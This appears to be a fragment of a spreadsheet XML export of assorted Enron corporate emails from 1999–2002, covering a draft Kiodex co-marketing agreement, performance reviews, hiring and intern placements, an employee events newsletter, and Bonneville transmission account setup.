_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gentlemen:_x000D_
_x000D_
	Here is a revised draft of the Co-Marketing Agreement.  This is not_x000D_
final and should not be released to Kiodex.  This is an internal draft for_x000D_
our review.  We can send it along tomorrow, after Travis and I finish_x000D_
addressing the open issues, which are:_x000D_
_x000D_
	1.	How should we describe the Change of Control exception for_x000D_
Warburg, in light of the term sheet that gives Warburg rights to future_x000D_
financing.  Should we stick with the single transaction?_x000D_
_x000D_
	2.	We need to confirm the response time in Section 6.6(d)._x000D_
Kiodex wants to change 0.25 sec to 2 or 3 sec._x000D_
_x000D_
	3.	We need to confirm what information will be included in the_x000D_
Enron Transaction Data, and which data Kiodex will have to extract or add._x000D_
_x000D_
	4.	I deleted the termination right in Section 8.3(k) on the_x000D_
assumption that we are going to a concurrent closing._x000D_
_x000D_
	5.	I would like to confirm that the definition of the Kiodex_x000D_
Application is okay.  I made that up, and no one has ever commented on it._x000D_
_x000D_
	There may be some other minor points, but I think that this is most_x000D_
of it._x000D_
_x000D_
	Travis, I will call you tomorrow afternoon._x000D_
_x000D_
	Best regards,_x000D_
_x000D_
	Ted_x000D_
_x000D_
 The following files have been attached to this email by DeltaView..._x000D_
_x000D_
March 14 CoMarketing Agreement.DOC  ( WORD97 )_x000D_
Redline.rtf  ( Rich Text Format )_x000D_
          ++++++CONFIDENTIALITY NOTICE+++++_x000D_
The information in this email may be confidential and/or privileged.  This_x000D_
email is intended to be reviewed by only the individual or organization_x000D_
named above.  If you are not the intended recipient or an authorized_x000D_
representative of the intended recipient, you are hereby notified that any_x000D_
review, dissemination or copying of this email and its attachments, if any,_x000D_
or the information contained herein is prohibited.  If you have received_x000D_
this email in error, please immediately notify the sender by return email_x000D_
and delete this email from your system.  Thank You_x000D_
 &lt;&lt;March 14 CoMarketing Agreement.DOC&gt;&gt;   &lt;&lt;Redline.rtf&gt;&gt;_x000D_
_x000D_
 - March 14 CoMarketing Agreement.DOC _x000D_
 - Redline.rtf </t>
  </si>
  <si>
    <t>Tue, 17 Oct 2000 07:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: PRC</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
If we give these reviews in late Jan or Feb of next year, I think I could _x000D_
review Chris, Jason, Anne, and Jennifer.  I don't think I should review Dawn, _x000D_
Greg, or Kim.  Although, if I were in their shoes, I would want you involved _x000D_
in some capacity.  What do you think?_x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Jeffrey C Gossett                           10/17/2000 01:57 PM_x000D_
	_x000D_
_x000D_
To: William Kelly/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, Darron C _x000D_
Giron/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: PRC_x000D_
_x000D_
Don't forget to send me the names of the people that you intend on reviewing._x000D_
_x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 15:07:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brudy@umich.edu'})</t>
  </si>
  <si>
    <t>Whazzup!</t>
  </si>
  <si>
    <t xml:space="preserve">Rude Dog,  How is it going?  Enjoying every moment of marital bliss!!  Must be weird to be a student again and have to do all that studying and drink all that beer._x000D_
_x000D_
The Horns are looking pretty good.  The defense has really been spectacular as well as special teams.  The offense is sputtering right now, but I think they will get back on track.  I am going to the UH game this weekend.  We had better put a whipping on them. But with Texas you never know.  Gone to any Michigan games yet?_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 11:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Development Center Course Offerings</t>
  </si>
  <si>
    <t xml:space="preserve">SEPTEMBER CLASSES_x000D_
_x000D_
 Working Styles: Working With People Effectively - September 19  (4 hour _x000D_
session)  Cost:  $300.00_x000D_
This module helps participants understand how they perceive others and how _x000D_
others perceive them on the basis of behavioral clues. It also discusses what _x000D_
they can learn from those clues about working together effectively.  As a _x000D_
result,  participants will experience less interpersonal tension with members _x000D_
of the team or work unit._x000D_
 Communicating Effectively - September 19, &amp; 20  (4 hour sessions)      _x000D_
Cost:  $200.00_x000D_
Participants will learn the skills that facilitate and promote good _x000D_
communication, as well as the behaviors that indicate a willingness to _x000D_
communicate with others. As a result of the module, participants will have _x000D_
new models and tools that enhance their willingness and ability to _x000D_
communicate in the workplace._x000D_
 Fundamentals of Corporate Finance - September 21 &amp; 22   Cost:  $700.00_x000D_
This program is designed to provide managers, professionals, technical and _x000D_
staff personnel a basic understanding of finance and accounting principles _x000D_
that are imbedded in Enron equity transactions.   This program is also a good _x000D_
refresher in Finance and Accounting before taking the Applied Finance _x000D_
program.  _x000D_
 Applied Finance - September 28 &amp; 29    Cost:  $700.00_x000D_
If a basic understanding of Enron equity transactions (deals) will help you _x000D_
do your job better, this course is for you.  This course will help you _x000D_
understand how ENA structures deals, the "deal space", and how the financial _x000D_
principals discussed relate to ENA deals.     _x000D_
 FranklinCovey Project Managment: An Approach That Really Works*** - _x000D_
September 27   Cost:  $300.00_x000D_
This is a one-day introductory program designed for those who have never had _x000D_
project management training before.  This course will meet the needs of _x000D_
people who need to handle multiple small projects, with typically less than _x000D_
100 tasks._x000D_
_x000D_
***Pilot Class  _x000D_
_x000D_
For registration or more information, please click here () to go directly _x000D_
into the Development Center "Ernie", or call 3-0357._x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 08:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I want John to interview with the various desk heads (Scott, Hunter, Phillip, _x000D_
Tom).  I think I'm going to tell John not to mention the past.   It's an _x000D_
issue that doesn't need to be made public and as long as Lavo and myself are _x000D_
okay with it, I don't see the need to get individual approval from everyone.  _x000D_
Thanks for your help,_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ed McMichael_x000D_
01/03/2001 08:37 AM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Thanks for the inquiry.  I sincerely appreciate you giving me the heads up.  _x000D_
As much as it pains me to say yes, I think John has proved himself worthy and _x000D_
I am willing to let him interview for the job.  As we talked about before, my _x000D_
only condition is that you guys make sure you are willing to take him if he _x000D_
comes out on top.  If there is any chance that his past will negatively _x000D_
influence your decision, I am not willing to let him interview.  He handled _x000D_
the last experience with real maturity, but I do not want him to have any _x000D_
more reasons to doubt his ability to overcome his past by working hard and _x000D_
proving himself here.  He is very valuable to me and ENA.  Please let me _x000D_
know.  _x000D_
Ed  _x000D_
_x000D_
      _x000D_
_x000D_
_x000D_
_x000D_
John Arnold_x000D_
01/02/2001 09:04 PM_x000D_
To: Ed McMichael/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Ed:_x000D_
I am starting options on EOL in about two weeks.  As we discussed earlier, I _x000D_
don't have the appropriate manpower to run this in certain circumstances, _x000D_
such as when I'm out of the office.  As such, I'd like to bring in John _x000D_
Griffith for anohter round of interviews for an options trading role with _x000D_
your permission.  _x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Dec 1999 01:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: EOL Credit Approvals - New EOL Counterparty setup in Global</t>
  </si>
  <si>
    <t xml:space="preserve">Are you approving this for financial trading?  Per our conversations last _x000D_
week, I thought it would not meet the eligible swap participant criteria.  _x000D_
Let me know...._x000D_
--------------------- Forwarded by Tana Jones/HOU/ECT on 12/09/99 09:39 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Samuel Schott                           12/08/99 06:01 PM_x000D_
	_x000D_
_x000D_
To: Molly Harris/HOU/ECT@ECT_x000D_
cc: Frank L Davis/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Amelia Alland/HOU/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT, Bernice Rodriguez/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, _x000D_
Brant Reves/HOU/ECT@ECT _x000D_
Subject: Re: EOL Credit Approvals - New EOL Counterparty setup in Global  _x000D_
_x000D_
Draig Energy Ltd. - CP/ID# 72516 _x000D_
_x000D_
Rgds._x000D_
_x000D_
Samuel x3-9890_x000D_
(Global CounterParty_Enron NA)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 04:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tom Engel</t>
  </si>
  <si>
    <t xml:space="preserve">He has been focused on Sitara for a long time.  He reports to Scott Mills, _x000D_
who is the user lead for the project.  I am copying Scott on this message, as _x000D_
his Sitara team is small and he would know best what deliverables are on the _x000D_
horizon and how critical Tom's involvement is to those deliverables.  I _x000D_
suggest that we involve Scott in these discussions.  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
05/08/2000 10:09 AM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Tom Engel_x000D_
_x000D_
We were thinking Tom would be a great fit for the EnronOnline development job _x000D_
we are currently.  Mark Dilworth is going to approach him - if OK with you._x000D_
We think he wants a change (we think he has been on Sitara 3 years)._x000D_
_x000D_
_x000D_
Louise_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 Jan 2002 17:36:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/11/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/11/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011116.txt</t>
  </si>
  <si>
    <t>Mon, 27 Aug 2001 07:09:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: There are several of these notices, do you need to/have_x000D_
 authority to access them?</t>
  </si>
  <si>
    <t>No.  Thanks for asking._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rozycki, Joanne  _x000D_
Sent:	Monday, August 27, 2001 9:03 AM_x000D_
To:	Heard, Marie_x000D_
Subject:	There are several of these notices, do you need to/have authority to access them?_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	CommodConfirmsAdmin@gs.com@ENRON [mailto:IMCEANOTES-CommodConfirmsAdmin+40gs+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Friday, August 24, 2001 6:03 PM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	Contract Notification_x000D_
_x000D_
Dear Representative of ENRON C&amp;T USA.  There are new confirmations available for your review at: https://www.gs.com/ja/cos/docsearch_x000D_
_x000D_
If you have any problems, questions or comments regarding this e-mail please contact Sal Gentile at Tel: 212 902 5918</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 02:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rika.imai@enron.com', 'tom.may@enron.com', 'lloyd.will@enron.com'})</t>
  </si>
  <si>
    <t>RE: Interns</t>
  </si>
  <si>
    <t xml:space="preserve">HI Lloyd,  appreciate your efforts.  Resume on its way.. the start date _x000D_
however would be Monday, 21st._x000D_
_x000D_
thx. kb._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Will, Lloyd  _x000D_
Sent: Friday, May 18, 2001 9:22 AM_x000D_
To: Buckley, Karen; Imai, Rika; May, Tom_x000D_
Cc: Hernandez, Juan; Melodick, Kim; Bland Jr., Ted C._x000D_
Subject: Re: Interns_x000D_
_x000D_
Should be able to help out.  Please send me the resume and I will reply by _x000D_
end of day._x000D_
_x000D_
Start date is June 4th._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Karen Buckley/ENRON@enronXgate 05/18/2001 08:36 AM 	   To: Juan _x000D_
Hernandez/Corp/Enron@ENRON, Ted C Bland/ENRON@enronXgate, Lloyd _x000D_
Will/HOU/ECT@ECT  cc: Kim Melodick/ENRON@enronXgate  Subject: Interns_x000D_
_x000D_
_x000D_
Hi Juan_x000D_
_x000D_
Thanks for speaking with me earlier.   Ted , will be speaking with the _x000D_
interns (both Associate and Analyst level) who are scheduled to start June _x000D_
4th  to discuss the real time opportunity.  For the moment therefore , we _x000D_
will re-assign Andrew Kandolha to someone else as he is starting next week._x000D_
_x000D_
Lloyd  - can you possibley absorb, per our discussions this am, Andrew .   _x000D_
_x000D_
Background:  Dynergy: Power Settlements Intern_x000D_
   Natsource Institution Energy Brok: Power Broker Intern_x000D_
Academics:  Texas A&amp; M Uni - Backelor of business Admin in Fiannce._x000D_
_x000D_
I will forward you the resumes this am._x000D_
_x000D_
Many thanks ._x000D_
_x000D_
Karen._x000D_
x54667_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Buckley, Karen  _x000D_
Sent: Thursday, May 17, 2001 3:22 PM_x000D_
To: Hernandez, Juan_x000D_
Cc: Melodick, Kim; Engler, Adrianne_x000D_
Subject: FW: Allocatioon of A&amp;A_x000D_
_x000D_
Hi Juan_x000D_
_x000D_
Per my previous e:mail below we have now assigned you your second requested _x000D_
intern (per Kevin Presto's earlier request to John Lavorato).    These Inters _x000D_
were on Kevin  Presto's actual selection of candidates for his world.   Their _x000D_
names as per the attached spreadsheet:   I believe you will have Andrews _x000D_
resume as earlier sent, and I will forward you Joseph's today._x000D_
_x000D_
Joseph Spector    Start date:   June 4th_x000D_
Andrew Kandolha  Start date:  May 21st_x000D_
_x000D_
The A&amp;A Program will be in contact with your assistant to set up appropriate _x000D_
systems etc._x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Buckley, Karen  _x000D_
Sent: Tuesday, May 15, 2001 5:36 PM_x000D_
To: Will, Lloyd; Herndon, Rogers; Hernandez, Juan; Bentley, Corry_x000D_
Cc: Melodick, Kim_x000D_
Subject: Allocatioon of A&amp;A_x000D_
_x000D_
 &lt;&lt; File: Presto A&amp;A.xls &gt;&gt; _x000D_
_x000D_
Pls find the allocation of A&amp;A and interns to your groups._x000D_
_x000D_
rgds, Karen._x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 16:24:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.krautz@enron.com'})</t>
  </si>
  <si>
    <t>message</t>
  </si>
  <si>
    <t>I have had the upmost respect for you since joining Enron and it was reaffirmed with your message today.  I don't agree with your decision to give the money back but I think it speaks volumes as to your character.  Good luck wherever you go and thanks for the leadership you have provided Enron._x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Fri, 9 Jun 2000 00:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vanessa.carranza@enron.com'})</t>
  </si>
  <si>
    <t>Re: Moving Roy Ibasco</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Vanessa:_x000D_
_x000D_
You will need to fill out a "Churn Request" and forward it to the "Move Team"_x000D_
they will take care of everything that you put on the form.  I am attaching a _x000D_
copy _x000D_
of the form for your information.  The receiving department is responsible _x000D_
for _x000D_
doing this.  He will need boxes to pack his belongings (ask him how many _x000D_
he needs - he will have to do the packing).  The only item that moves other_x000D_
than his personal items, is his telephone.  The computer, chair, etc.  _x000D_
belongs to _x000D_
the Research Group._x000D_
_x000D_
If you have any questions, or need help, please let me know._x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vanessa Carranza@ENRON_x000D_
06/08/2000 04:47 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Moving Roy Ibasco_x000D_
_x000D_
Shirley-_x000D_
_x000D_
I need to have Roy Ibasco's things moved to EB2930C from EB1948 and have it _x000D_
charged to Co/RC 413-1708.  Please give me a call if you have any questions!_x000D_
_x000D_
Thanks-_x000D_
Vanessa C_x000D_
3-5030_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Bill Aldinger/PRC</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Bill Aldinger/PRC_x000D_
_x000D_
Date:		1/26/2001_x000D_
Time:		11:30 AM - 11:55 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 10:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron In Action 04.23.01</t>
  </si>
  <si>
    <t xml:space="preserve">Enron employees are invited to celebrate the Topping-Out of Enron Center=20_x000D_
South this afternoon, Monday April 23rd at 3:45 pm in Antioch Park.  You ha=_x000D_
ve=20_x000D_
signed the last beam........  Now watch it rise.  In celebration of Arbor=_x000D_
=20_x000D_
Day, tree saplings will be handed out to all employees._x000D_
_x000D_
Join us in Antioch Park on Friday, April 27th for the April Big E Cafe! =20_x000D_
Lunch will be catered by Escalantes Mexican Grille with a choice of beef,=_x000D_
=20_x000D_
chicken or veggie fajitas with trimmings, dessert and a drink for $5.  Live=_x000D_
=20_x000D_
salsa music will be provided by Tropicrew, featuring Enron=01,s own Ms. Ale=_x000D_
x=20_x000D_
Villarreal as the lead singer.  Non-profit organizations represented will=_x000D_
=20_x000D_
include the March of Dimes, SEARCH and the Lupus Foundation of America.  Ge=_x000D_
t=20_x000D_
lunch free if you're dressed "freaky"!_x000D_
_x000D_
Keeping with our Mind=01,s Eye Madness week, be sure to check out the Enron=_x000D_
 Mind=01,_x000D_
s Eye Motorcade which will be on-site during lunch.  This art car convoy wi=_x000D_
ll=20_x000D_
be spending the day visiting Enron-designated stops in the community to=20_x000D_
promote innovation and creativity.  Want to volunteer for the convoy, call=_x000D_
=20_x000D_
Jessica at x31918 - shifts are 9:00am - 1:00pm and 1:00pm to 4:00pm. =20_x000D_
_x000D_
With a view to highlight advancements in technology, new businesses at Enro=_x000D_
n=20_x000D_
and the importance of being yourself, this week-long celebration will take=_x000D_
=20_x000D_
place in the Enron Building lobby during lunchtime from Tuesday, April 24th=_x000D_
=20_x000D_
through Friday, April 27th.  More details to follow via e-mail and ETV!_x000D_
Monday   Imagine the Future_x000D_
Tuesday  Laser-Focused Business_x000D_
Wednesday  The Power of Perspicuity_x000D_
Friday   Freaky Friday &amp; the Big E Cafe_x000D_
_x000D_
Experience the event named by the Houston Press as Houston's Best Party!  =_x000D_
=20_x000D_
The festivities take place on Thursday, April 26th from 7:00pm to 11:00pm a=_x000D_
t=20_x000D_
the Astrodome.  The Art Car Ball boasts over 5,000 guests, rocket-fueled=20_x000D_
fashions, fantastic food, otherworldly entertainment, music, dancing and=20_x000D_
unbridled merriment where all kinds unite to respect the unexpected in=20_x000D_
space-age style. This year musical entertainment will include Carolyn=20_x000D_
Wonderland, Marcia Ball and Royal Crown Revue.  Discounted tickets will be=_x000D_
=20_x000D_
available in the Enron Building lobby next Tuesday through Thursday (visit=_x000D_
=20_x000D_
the Mind's Eye Motorcade information table) for $40 each and will be $50 at=_x000D_
=20_x000D_
the door.  All proceeds benefits The Orange Show Foundation programs - for=_x000D_
=20_x000D_
more information, visit www.orangeshow.org._x000D_
_x000D_
Please join us for a brownbag concert on Friday, May 4 from 12:00 =01) 1:00=_x000D_
 p.m.=20_x000D_
at Two Allen Center in the Forum (7th floor).  Da Camera presents, =01&amp;The =_x000D_
Ying=20_x000D_
Quartet=018 performing selected 20th Century chamber pieces._x000D_
_x000D_
Also, De Camera is offering a 20% discount to Enron employees to Da Camera=_x000D_
=01,s=20_x000D_
200/01 season finale concert, =01&amp;Celebrating Patronage=018 on Saturday, Ma=_x000D_
y 6 at=20_x000D_
The Wortham Center._x000D_
_x000D_
If you are interested, please RSVP to Jessica Nunez at X31918_x000D_
_x000D_
Do you hate to garden in the summer because everything you plant dies?  Lin=_x000D_
da=20_x000D_
Gay, Director of the Mercer Arboretum and Botanic Gardens in Humble, will=_x000D_
=20_x000D_
teach us about plants that not only survive, but thrive during the dog days=_x000D_
=20_x000D_
of Houston summers. Topics will include tropical-looking plants for sun and=_x000D_
=20_x000D_
shade, gingers, fragrant plants, and drought-tolerant plants._x000D_
_x000D_
WHEN:  Tuesday, May 8th, 11:30 a.m. - 12:30 p.m._x000D_
WHERE: The Forum, 12th floor of 2 Allen Center_x000D_
_x000D_
Houston area singles interested in jazz, dessert and classical music can me=_x000D_
et=20_x000D_
and mingle on Friday, May 4, 2001._x000D_
_x000D_
The evening of entertainment begins at 5:30 p.m., with live jazz by the Blu=_x000D_
e =20_x000D_
Monks at Sambuca Jazz Cafes at 909 Texas Avenue.  Complimentary hors=20_x000D_
d'oeuvres and a cash bar are available at the pre-concert party._x000D_
_x000D_
At 7p.m., you're off to Jones Hall across the street for dessert at the Rou=_x000D_
nd=20_x000D_
Bar before the Houston Symphony performance at 8 p.m._x000D_
_x000D_
David Robertson, Musical America's Conductor of the Year 2000, will lead=20_x000D_
Beethoven's idyllic romp through the countryside, Symphony No. 6, Pastoral.=_x000D_
 =20_x000D_
The  program concludes with Prokofiev's patriotic Alexander Nevsky,=20_x000D_
originally written for the Eisenstein film of the same name, and the=20_x000D_
legendary Battle on the Ice, featuring the Houston Symphony Chorus._x000D_
_x000D_
Tickets are $35 and include the pre-concert party at Sambuca, dessert at th=_x000D_
e=20_x000D_
Round Bar in Jones Hall and reserved concert seating.  Pre-paid reservation=_x000D_
s=20_x000D_
are required and space is limited.  Singles only please.  Make your=20_x000D_
reservations on-line at www.houstonsymphony.org or call 713 238-1477._x000D_
_x000D_
CyberAuction - March Of Dimes -- Wednesday, April 25 9:00 am to Thursday,=_x000D_
=20_x000D_
April 26 4:00 pm.  For more details go to http://home.enron.com._x000D_
_x000D_
_x000D_
WalkAmerica, taking place April 29, is the March of Dimes biggest=20_x000D_
fund-raiser. Money raised from the WalkAmerica supports pioneering research=_x000D_
=20_x000D_
and innovative programs that save babies born prematurely or with birth=20_x000D_
defects. Since its beginning in 1970, WalkAmerica has raised more than $1=_x000D_
=20_x000D_
billion to help give babies a fighting chance._x000D_
_x000D_
Every dollar raised will be matched by Enron._x000D_
_x000D_
You can read more about the March of Dimes at www.modimes.org._x000D_
_x000D_
For more information, please contact Kimberly Nelson (ext. 33580) or Gina=_x000D_
=20_x000D_
Taylor (ext. 37681)._x000D_
_x000D_
_x000D_
_x000D_
We need volunteers to allow a student to be their =01&amp;shadow=018 for an aft=_x000D_
ernoon! =20_x000D_
These students can assist you with copying, filing and general clerical tas=_x000D_
ks=20_x000D_
and would appreciate the opportunity to watch you work!! LUNCH WITH YOUR=20_x000D_
STUDENT AT THE BIG E CAF_ WILL BE PROVIDED!!!!!!!!!!!!!!!_x000D_
_x000D_
The Keystone Club is a national program of Boys &amp; Girls Clubs of America. =_x000D_
=20_x000D_
Keystone Clubs are chartered, small group leadership development clubs for=_x000D_
=20_x000D_
young people who are members of local Boys &amp; Girls Clubs and are aged 14-18=_x000D_
.=20_x000D_
Keystoners elect officers, choose their own activities and plan and impleme=_x000D_
nt=20_x000D_
community service projects._x000D_
_x000D_
One of the special programs offered to Keystoners under the Education and=_x000D_
=20_x000D_
Career Objective is the Career Experience Program.  A small group of Keysto=_x000D_
ne=20_x000D_
Club members will visit Enron, where they will shadow career professionals =_x000D_
in=20_x000D_
the work environment.  Enron will host a group of 25 Keystoners on Friday,=_x000D_
=20_x000D_
April 27th from approximately 11:30-4. =20_x000D_
_x000D_
If you are interested in helping the Boys &amp; Girls Clubs of America by hosti=_x000D_
ng=20_x000D_
a Keystoner on April 27th, please contact Jennifer Milligan at X35272._x000D_
_x000D_
The Enron Mind's Eye Motorcade is an art car convoy sponsored by Enron.  It=_x000D_
=20_x000D_
will visit Enron-designated stops in the community including our adopted=20_x000D_
schools, non-profit organizations and medical center facilities dedicated t=_x000D_
o=20_x000D_
treating children.   Enron employees are needed to accompany the convoy and=_x000D_
=20_x000D_
interact with the community by communicating the importance of innovation. =_x000D_
 =20_x000D_
When registering, please designate your time preference.  Available times=_x000D_
=20_x000D_
include 9:00am to 1:00pm and 1:00pm to 4:00pm - thank you for your=20_x000D_
participation!_x000D_
_x000D_
Volunteers Needed!  Wednesday, April 25, 2001 at the George R. Brown=20_x000D_
Convention Center, Exhibit Hall A.  from 11:00 a.m. to 1:00 p.m. to assist=_x000D_
=20_x000D_
with the Texas Scholars Senior Recognition Ceremony/Luncheon._x000D_
_x000D_
This ceremony recognizes over 4,000 high school seniors who met the program=_x000D_
=20_x000D_
requirements for graduation from high school.  During the ceremony,=20_x000D_
volunteers are needed to place the Texas Scholars medallions around the nec=_x000D_
ks=20_x000D_
of HISD students._x000D_
_x000D_
Please contact Jennifer Milligan at X35272 if you are interested._x000D_
_x000D_
_x000D_
ChildBuilders, Houston's Advocates for Mental Health in Children,  is hosti=_x000D_
ng=20_x000D_
a special lunch time event in honor of Children's Mental Health Awareness=_x000D_
=20_x000D_
Week at Hermann Square, featuring actors performing vignettes on issues and=_x000D_
=20_x000D_
parenting.  Zydeco music, free soft drinks and deserts will also be=20_x000D_
available. =20_x000D_
_x000D_
Volunteers will receive a free t-shirt and are needed to publicize the even=_x000D_
t,=20_x000D_
fill balloons, set-up tables and chairs, serve drinks and deserts, and to=_x000D_
=20_x000D_
assist with clean-up.  To sign up for these jobs, please email your name,=_x000D_
=20_x000D_
phone number, and email address to Dottie Bates at dsquareb@msn.com or call=_x000D_
=20_x000D_
(713) 932-8440._x000D_
_x000D_
_x000D_
_x000D_
The Enron Running Club is looking for 75+ volunteers to assist at the Speci=_x000D_
al=20_x000D_
Olympics Summer Track &amp; Field Meet being held April 28 - 29.  There are man=_x000D_
y=20_x000D_
volunteer opportunities including timers, award escorts, assisting at water=_x000D_
=20_x000D_
tables, cheering on athletes and more!  We are looking for employees,=20_x000D_
families and friends that can contribute a few hours or who are willing to=_x000D_
=20_x000D_
spend the day benefiting a great cause.  Please contact Cindy Richardson,=_x000D_
=20_x000D_
x3-4770 or Kelly Lombardi, x3-8491 for more information or run to: =20_x000D_
http://home.enron.com:84/erc/index.html_x000D_
_x000D_
VOLUNTEERS NEEDED FOR 15TH  ANNUAL HOUSTON HOOP-IT-UP MAY 5-6!_x000D_
_x000D_
The best way to get yourself jump-started for a full year of Hoops.  Become=_x000D_
 a=20_x000D_
part of this jammin=01,hoops scene with over 1,200 teams &amp; 4,800 players.  =_x000D_
Join=20_x000D_
us at Greenspoint Mall for a basketball-crazed atmosphere.  Games and speci=_x000D_
al=20_x000D_
events being played simultaneously on 110 courts so the basketballs will be=_x000D_
=20_x000D_
flying HOOP-IT-UP is where you play for FUN.  EVENT BENEFITS THE =01&amp;ESCAPE=_x000D_
=20_x000D_
FAMILY RESOURCE CENTER=018_x000D_
_x000D_
SATURDAY =01)  MAY 5TH 8:00 =01) 6:00 PM_x000D_
SUNDAY =01)  MAY 6TH 8:00 =01) 5:00 PM_x000D_
_x000D_
For more information please call =01&amp;Hoop-It-Up Hotline=018: 713-521-4535 o=_x000D_
r_x000D_
E-Mail: Hoopitup@Texas.Net=20_x000D_
_x000D_
_x000D_
_x000D_
Double click on the icon below to learn more about the new Enron Kids'=20_x000D_
Center. =20_x000D_
_x000D_
http://home.enron.com:84/messaging/e_kids_announce423.pdf_x000D_
_x000D_
Have News to Share?_x000D_
To post news or events in Enron In Action, please e-mail your information t=_x000D_
o=20_x000D_
EIA@enron.com=20_x000D_
no later than 12:00 noon the Thursday prior to the next Monday=01,s mailing=_x000D_
._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 03:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Bonneville Account #'s</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Bill Williams III/PDX/ECT on 02/02/2001 _x000D_
11:14 AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Bill Williams III                           01/05/2001 02:52 PM_x000D_
	_x000D_
_x000D_
To: Portland Shift_x000D_
cc:  _x000D_
_x000D_
Subject: Bonneville Account #'s_x000D_
_x000D_
Group,_x000D_
_x000D_
Last night we flowed energy out of the Alberta Power Pool.  We picked this _x000D_
energy up at the BC border, used SNOPUD network to take it to Mid C, and sold _x000D_
it for a nice profit to WWP.  Congrats to Jesse and Guzman for getting it _x000D_
done._x000D_
I have set up two accounts with BPA that might be of use to us in working _x000D_
with Enron Canada regarding the Alberta Power Pool.  _x000D_
The first account is from the BC Border to Malin.  This account is non-firm _x000D_
on the network and non-firm on the malin intertie.  It is the same type of _x000D_
product we use from Hotsprings down to Malin.  The North-South account number _x000D_
is #682485._x000D_
_x000D_
I have also set up an account going South-North from the Caiso to BC Hydro at _x000D_
the BC border.  This is non-firm on the Malin intertie and non-firm on the _x000D_
network.  This account will allow us to flow north from the southwest through _x000D_
California and take energy to either PowerX or the power pool.  The _x000D_
South-North account number is #682781._x000D_
_x000D_
Additionally, there has been concern over selling a non-firm transmission _x000D_
contingent product.  Remember you can buy spinning reserves(call option) and _x000D_
then sell that energy as firm if you would like._x000D_
_x000D_
If you have any questions please let me know._x000D_
Bill_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 01:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
